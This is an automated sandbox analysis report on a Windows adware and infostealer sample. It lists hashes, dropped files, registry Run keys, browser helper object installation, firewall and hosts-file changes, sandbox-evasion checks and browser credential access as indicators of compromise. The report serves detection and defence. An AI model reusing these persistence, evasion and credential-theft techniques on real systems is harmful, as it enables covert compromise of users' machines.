c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e

Analysis

max time kernel
184s
max time network
189s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2022 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Size

2.2MB
MD5

8feb836bd361e165c2befe860ebe224b
SHA1

d665c6418e89d8fdfc5d592f8c97ea40e6d5a8d6
SHA256

c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e
SHA512

d50b221204e0694d9804ed61e19c439231a8fa71809aecd2a7ecc4318d676b7e4dc27b65b5a84d776a8dcd81d9126d9c14f38fafb1f061f5786106b5c3e473a8
SSDEEP

49152:GKa3UDk3qT70fTYkyw6Uhv2qZ6SMIOT52xniiWGG05F:Gt3UDkaT4TYMJ2qdML5wiiw05F

Score

9^/10

adware discovery evasion persistence spyware stealer upx

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 4 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll	acprotect

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Drops file in Drivers directory 1 IoCs

Processes:

cscript.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts cscript.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cscript.exe

Executes dropped EXE 24 IoCs

Processes:

SoftwareDetector.exesqlite3.exesqlite3.exestorageedit.exeUpdater.exeupdater.exeupdater.exeupdater.exeupdater.exeSoftwareDetector.exeSoftwareDetector.exegpedit.exebservice.exebservice64.exewd.exeSoftwareDetector.exeFrameworkEngine.exepwdg.exeproc.exeupdater.exeupdater.exeupdater.exeupdater.exe

pid	process
1412	SoftwareDetector.exe
516	sqlite3.exe
4240	sqlite3.exe
4660	storageedit.exe
3852	Updater.exe
3700	updater.exe
3708	updater.exe
4524	updater.exe
2276	updater.exe
4440	SoftwareDetector.exe
2936	SoftwareDetector.exe
4400	gpedit.exe
4412	bservice.exe
1708	bservice64.exe
2764	wd.exe
2052	SoftwareDetector.exe
1968	FrameworkEngine.exe
5048	pwdg.exe
2804
4876	proc.exe
4332	updater.exe
516	updater.exe
3600	updater.exe
316	updater.exe

Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

744 netsh.exe
4708 netsh.exe

pid	process
744	netsh.exe
4708	netsh.exe

Registers COM server for autorun 1 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\InprocServer32\ = "C:\\Program Files (x86)\\protectedsurf\\FrameworkBHO64.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\InprocServer32\ = "C:\\Program Files (x86)\\protectedsurf\\FrameworkBHO64.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll	upx
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll	upx
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll	upx
C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\md5dll.dll	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SoftwareDetector.exeSoftwareDetector.exeSoftwareDetector.exeSoftwareDetector.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SoftwareDetector.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SoftwareDetector.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SoftwareDetector.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SoftwareDetector.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

pwdg.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation pwdg.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	pwdg.exe

Loads dropped DLL 64 IoCs

Processes:

c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exebservice.exebservice64.execscript.execscript.exeFrameworkEngine.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exenetsh.exenetsh.exepwdg.exeproc.exeupdater.exeupdater.execscript.execscript.execscript.exe

pid	process
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
4412	bservice.exe
1708	bservice64.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
3036
4316	cscript.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2280
5032	cscript.exe
1968	FrameworkEngine.exe
1836	regsvr32.exe
1836	regsvr32.exe
1752	regsvr32.exe
1752	regsvr32.exe
1632	regsvr32.exe
1632	regsvr32.exe
1480	regsvr32.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
380
4708	netsh.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2328
744	netsh.exe
5048	pwdg.exe
4876	proc.exe
960
516	updater.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
316	updater.exe
1064
1844	cscript.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
4524
1744	cscript.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
4788
4420	cscript.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Bench Settings Cleaner = "C:\\Program Files (x86)\\Bench\\Proxy\\cl.exe"	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\protectedsurf	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\protectedsurf-repairJob = "wscript.exe \"C:\\Users\\Admin\\AppData\\Local\\protectedsurf\\repair.js\" \"protectedsurf-repairJob\""	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\BService = "C:\\Program Files (x86)\\Bench\\BService\\1.1\\bservice.exe"	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\BService64 = "C:\\Program Files (x86)\\Bench\\BService\\1.1\\bservice64.exe"	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Wd = "C:\\Program Files (x86)\\Bench\\Wd\\wd.exe"	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Bench Communicator Watcher = "C:\\Program Files (x86)\\Bench\\Proxy\\pwdg.exe"	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Installs/modifies Browser Helper Object 2 TTPs 6 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

Processes:

regsvr32.exeregsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9CAE7395-64C7-465D-BE3D-4235878F1332}\ = "protectedsurf BHO"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9CAE7395-64C7-465D-BE3D-4235878F1332}\NoExplorer = "1"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9CAE7395-64C7-465D-BE3D-4235878F1332}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9CAE7395-64C7-465D-BE3D-4235878F1332}\ = "protectedsurf BHO"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9CAE7395-64C7-465D-BE3D-4235878F1332}\NoExplorer = "1"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9CAE7395-64C7-465D-BE3D-4235878F1332}	regsvr32.exe

Maps connected drives based on registry 3 TTPs 8 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

SoftwareDetector.exeSoftwareDetector.exeSoftwareDetector.exeSoftwareDetector.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	SoftwareDetector.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	SoftwareDetector.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	SoftwareDetector.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	SoftwareDetector.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	SoftwareDetector.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	SoftwareDetector.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	SoftwareDetector.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	SoftwareDetector.exe

Drops file in System32 directory 4 IoCs

Processes:

gpedit.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	gpedit.exe
File opened for modification	C:\Windows\System32\GroupPolicy	gpedit.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	gpedit.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	gpedit.exe

Drops file in Program Files directory 64 IoCs

Processes:

c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.execscript.exeupdater.execscript.exe

description	ioc	process
File created	C:\Program Files (x86)\protectedsurf\background.html	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\context_menu.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\tail-left.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\NmHost\manifest.json	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\AppFramework\appAPI_webrequest.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\icons\icon128.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File opened for modification	C:\Program Files (x86)\protectedsurf\extension_info.json	cscript.exe
File created	C:\Program Files (x86)\protectedsurf\AppFramework\appAPI_common.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\AppFramework\appAPI_content.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\CanvasFramework\canvas_bg.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\notification.html	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\Updater\products.xml	updater.exe
File created	C:\Program Files (x86)\protectedsurf\FrameworkBHO64.dll	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\bottom-right.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\top-left.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\FrameworkBHO.dll	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\config.xml	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\CanvasFramework\md5.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\initialize.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\messaging.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\BService\1.1\bhelper.dll	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\BService\1.1\bservice64.exe	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\Proxy\pwdg.exe	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\FrameworkEngine.exe	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\io.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\json2.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\options.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\ui_base.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\Updater\updater.exe	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\Proxy\cl.exe	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\backgroundscript_engine.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\i18n.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\timer.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\xhr.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\top-right.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\context_menu_item_handler.html	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\tail-bottom.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File opened for modification	C:\Program Files (x86)\Bench\Updater\products.xml	updater.exe
File created	C:\Program Files (x86)\Bench\Proxy\proc.exe	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\CanvasFramework\registry.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\top-middle.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\AppFramework\appAPI_bg.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\framework.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\message_target.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\userscript_client.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\middle-left.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\invoke_async.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\updater.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\bottom-middle.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\Bench\BService\1.1\bhelper64.dll	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\theme\bubble\bottom-left.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\icons\icon100.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\icons\icon48.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\base.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\browser.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\console.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\legacy.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\utils.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\icons\button.png	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File opened for modification	C:\Program Files (x86)\Bench\NmHost\manifest.json	cscript.exe
File created	C:\Program Files (x86)\protectedsurf\CanvasFramework\canvasscript_engine.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework\global.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
File created	C:\Program Files (x86)\protectedsurf\framework-ui\framework_api.js	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe

Drops file in Windows directory 3 IoCs

Processes:

Updater.exeupdater.exeupdater.exe

description	ioc	process
File created	C:\Windows\Tasks\bench-sys.job	Updater.exe
File created	C:\Windows\Tasks\bench-S-1-5-21-2629973501-4017243118-3254762364-1000.job	updater.exe
File opened for modification	C:\Windows\Tasks\bench-S-1-5-21-2629973501-4017243118-3254762364-1000.job	updater.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 16 IoCs

adware spyware

Modify Registry

T1112

Processes:

FrameworkEngine.exeregsvr32.exec462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exeregsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\AppPath = "C:\\Program Files (x86)\\protectedsurf\\"	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C} = "protectedsurf"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9D1486DE-B44E-4995-90EA-1946199E1EAF}	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar	regsvr32.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9D1486DE-B44E-4995-90EA-1946199E1EAF}	FrameworkEngine.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\Policy = "3"	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\AppName = "FrameworkEngine.exe"	FrameworkEngine.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\FrameworkEngine.exe = "10000"	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\Policy = "3"	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\AppPath = "C:\\Program Files (x86)\\protectedsurf\\"	FrameworkEngine.exe
